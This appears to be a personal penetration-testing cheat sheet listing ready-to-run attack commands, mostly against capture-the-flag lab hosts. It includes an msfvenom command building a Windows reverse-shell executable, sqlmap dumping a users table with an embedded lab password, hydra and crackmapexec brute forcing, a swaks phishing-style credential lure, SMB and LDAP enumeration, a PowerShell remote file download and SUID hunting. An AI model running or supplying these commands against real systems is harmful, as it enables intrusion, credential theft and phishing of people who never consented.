Pentest Notes
Most Common Usage of tools
sqlmap
-
sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
-
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php?debug" --string="This user exists" --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data "username=natas16" --level=5 --risk=3 -D natas15 -T users -C username,password --dump --dbms mysql -v 3
Fast Fuzzing Sub Domains fuff
- ./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H “Host: FUZZ.sneakycorp.htb” -fs 185 -fs is for filter
- ./fuff -u "/FUZZ" -w seclist -c -r -v
- ./ffuf -w /usr/share/seclists/Usernames/Names/names.txt -u "http://34.74.105.127/858d868c45/login" -X POST -d "username=FUZZ&password=FUZZ" -fw 16
Swaks: Swiss Army Knife for SMTP
- swaks -to $mail -from it@sneakymailer.htb -header "Subject:Credentials/Errors" -body "goto:http://10.10.14.131/" -server 10.10.10.197
Nikto
- Test all files with all root directories
- nikto -url "http://10.10.84.250/login.php" -mutate 1
- Host Authentication
- nikto -url -id admin:PrettyAwesomePassword1234
Hydra
- Hydra to bruteforce post request
- hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed”
wfuzz
- wfuzz to bruteforce POST request
- wfuzz -c -z file,/usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=FUZZ" -u "http://10.10.112.42/users/login.php" --hl 64
- wfuzz subdomain fuzzing
- wfuzz -c -f subdoamin.txt -w wordlist -u "" -H "Host:Fuzz.hostname.com" --hl 108
msfvenom
- msfvenom -p windows/shell/reverse_tcp lhost= lport= -f exe --platform x86 > reverse.exe
Samba
- smbclient \\10.10.10.12\Foldername -U username%pass -R
recursive listing - smbmap -H 10.10.10.*
- Downloading files recursively
- mask ""
- recurse ON
- prompt OFF
- mget *
- Mount smb shares
- sudo mount -t cifs /// /mnt/foldername -o "username=,password=
"
- sudo mount -t cifs /// /mnt/foldername -o "username=,password=
LDAP
- ldapsearch -x -h 10.10.10.193 -b 'dc=whatev,dc=whatev.local"
- ldapsearch -x -h 10.10.10.193 -s base namingcontexts
Crack Map Exec
- Check if we can bruteforce
- crackmapexec smb --passpol 10.10.10.* -M spider_plus
- Now bruteforce
- crackmapexec winrm -u "username" -p "pass.txt" -X "whomai /all"
RPC CLIENT
- rpcclient 10.10.10.* -U ""
- enumdomusers
- lookupnames administrator
- querydispinfo
Windows
- powershell -c "Invoke-WebRequest https://path/to/file.txt -OutFile C:\file.txt"
- whoami /priv
- Files of interst
- Windows/windowsupdate.log , system32/license.rtf
- evil-winrn -i -u username -p password
BASH
- netstat -tulpn
- gobuster vhost -u target.domain -w wordlist -o output.txt
- tcpdump -i tun0 icmp
- Find SUID files
- find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
- find / -perm -u=s -type f 2>/dev/null
- iconv -t UTF-16LE
- Hashcat to generate custom wordlist from keyphrases:
- hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule keyphrases.txt > wordlist_made.txt